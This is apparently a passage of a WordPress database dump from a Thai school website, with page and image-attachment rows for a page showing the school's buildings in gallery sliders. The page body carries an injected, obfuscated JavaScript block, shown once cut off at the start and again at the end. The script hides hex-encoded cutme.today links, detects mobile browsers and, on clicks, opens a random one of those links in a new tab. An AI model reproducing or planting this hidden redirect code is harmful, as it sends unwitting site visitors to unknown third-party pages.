_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลสิ่งก่อสร้าง','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%b4%e0%b9%88%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87','','','2024-08-07 11:48:17','2024-08-07 04:48:17','',0,'http://pakhaeng.ssk.in.th/?page_id=609',0,'page','',0),
(610,1,'2024-08-07 11:28:09','2024-08-07 04:28:09','','S__62119951','','inherit','','closed','','s__62119951','','','2024-08-07 11:28:09','2024-08-07 04:28:09','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg',0,'attachment','image/jpeg',0),
(611,1,'2024-08-07 11:28:24','2024-08-07 04:28:24','','S__62119948_0','','inherit','','closed','','s__62119948_0','','','2024-08-07 11:28:24','2024-08-07 04:28:24','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0.jpg',0,'attachment','image/jpeg',0),
(612,1,'2024-08-07 11:29:56','2024-08-07 04:29:56','','S__62119966_0','','inherit','','closed','','s__62119966_0','','','2024-08-07 11:29:56','2024-08-07 04:29:56','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg',0,'attachment','image/jpeg',0),
(613,1,'2024-08-07 11:30:01','2024-08-07 04:30:01','','S__62119967_0','','inherit','','closed','','s__62119967_0','','','2024-08-07 11:30:01','2024-08-07 04:30:01','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg',0,'attachment','image/jpeg',0),
(614,1,'2024-08-07 11:31:04','2024-08-07 04:31:04','','S__62119957_0','','inherit','','closed','','s__62119957_0','','','2024-08-07 11:31:04','2024-08-07 04:31:04','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg',0,'attachment','image/jpeg',0),
(615,1,'2024-08-07 11:31:06','2024-08-07 04:31:06','','S__62119959_0','','inherit','','closed','','s__62119959_0','','','2024-08-07 11:31:06','2024-08-07 04:31:06','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg',0,'attachment','image/jpeg',0),
(616,1,'2024-08-07 11:31:56','2024-08-07 04:31:56','','S__62119943_0','','inherit','','closed','','s__62119943_0','','','2024-08-07 11:31:56','2024-08-07 04:31:56','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg',0,'attachment','image/jpeg',0),
(617,1,'2024-08-07 11:34:02','2024-08-07 04:34:02','','S__62119960_0','','inherit','','closed','','s__62119960_0','','','2024-08-07 11:34:02','2024-08-07 04:34:02','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg',0,'attachment','image/jpeg',0),
(618,1,'2024-08-07 11:34:03','2024-08-07 04:34:03','','S__62119962_0','','inherit','','closed','','s__62119962_0','','','2024-08-07 11:34:03','2024-08-07 04:34:03','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg',0,'attachment','image/jpeg',0),
(619,1,'2024-08-07 11:34:06','2024-08-07 04:34:06','','S__62119963_0','','inherit','','closed','','s__62119963_0','','','2024-08-07 11:34:06','2024-08-07 04:34:06','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg',0,'attachment','image/jpeg',0),
(620,1,'2024-08-07 11:34:22','2024-08-07 04:34:22','','S__62119942_0','','inherit','','closed','','s__62119942_0','','','2024-08-07 11:34:22','2024-08-07 04:34:22','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg',0,'attachment','image/jpeg',0),
(621,1,'2024-08-07 11:34:54','2024-08-07 04:34:54','','S__62119969','','inherit','','closed','','s__62119969','','','2024-08-07 11:34:54','2024-08-07 04:34:54','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg',0,'attachment','image/jpeg',0),
(622,1,'2024-08-07 11:35:15','2024-08-07 04:35:15','','S__62119948_0','','inherit','','closed','','s__62119948_0-2','','','2024-08-07 11:35:15','2024-08-07 04:35:15','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg',0,'attachment','image/jpeg',0),
(623,1,'2024-08-07 11:38:48','2024-08-07 04:38:48','','S__62119968','','inherit','','closed','','s__62119968','','','2024-08-07 11:38:48','2024-08-07 04:38:48','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg',0,'attachment','image/jpeg',0),
(624,1,'2024-08-07 11:38:50','2024-08-07 04:38:50','','S__62119970','','inherit','','closed','','s__62119970','','','2024-08-07 11:38:50','2024-08-07 04:38:50','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg',0,'attachment','image/jpeg',0),
(625,1,'2024-08-07 11:38:58','2024-08-07 04:38:58','','S__62119950_0','','inherit','','closed','','s__62119950_0','','','2024-08-07 11:38:58','2024-08-07 04:38:58','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg',0,'attachment','image/jpeg',0),
(626,1,'2024-08-07 11:39:27','2024-08-07 04:39:27','','S__62119971_0','','inherit','','closed','','s__62119971_0','','','2024-08-07 11:39:27','2024-08-07 04:39:27','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg',0,'attachment','image/jpeg',0),
(627,1,'2024-08-07 11:39:29','2024-08-07 04:39:29','','S__62119973_0','','inherit','','closed','','s__62119973_0','','','2024-08-07 11:39:29','2024-08-07 04:39:29','',609,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg',0,'attachment','image/jpeg',0),
(628,1,'2024-08-07 11:40:34','2024-08-07 04:40:34','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e7f603-c8\",\"ids\":[625,623,624],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":625,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=625\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"width\":750,\"height\":422},{\"id\":623,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=623\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"width\":750,\"height\":422},{\"id\":624,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=624\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารห้องสมุด</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e50add-00\",\"ids\":[626,627],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":626,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=626\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"width\":750,\"height\":422},{\"id\":627,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=627\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>ห้องน้ำ สปช.601/26</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e70354-bb\",\"ids\":[620,617,618,619],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":620,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=620\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"width\":750,\"height\":422},{\"id\":617,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=617\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"width\":750,\"height\":422},{\"id\":618,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=618\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"width\":750,\"height\":422},{\"id\":619,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=619\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อคาพิเศษ 1 ชั้น</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7a2fca-b5\",\"ids\":[622,621],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":622,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=622\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"width\":750,\"height\":422},{\"id\":621,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=621\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียน สปช. 105/29 ปรับปรุง 2 ชั้น 4 ห้องเรียน (ชั้นล่างโล่ง)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_72c110-54\",\"ids\":[610,613,612],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":610,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=610\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"width\":1024,\"height\":576},{\"id\":613,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=613\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"width\":750,\"height\":422},{\"id\":612,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=612\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียน สปช. 104/26 ขนาด 3 ห้องเรียน</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_f12de5-af\",\"ids\":[616,614,615],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":616,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=616\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"width\":750,\"height\":422},{\"id\":614,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=614\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"width\":1024,\"height\":576},{\"id\":615,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=615\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p>อาคารเรียนอนุบาล</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 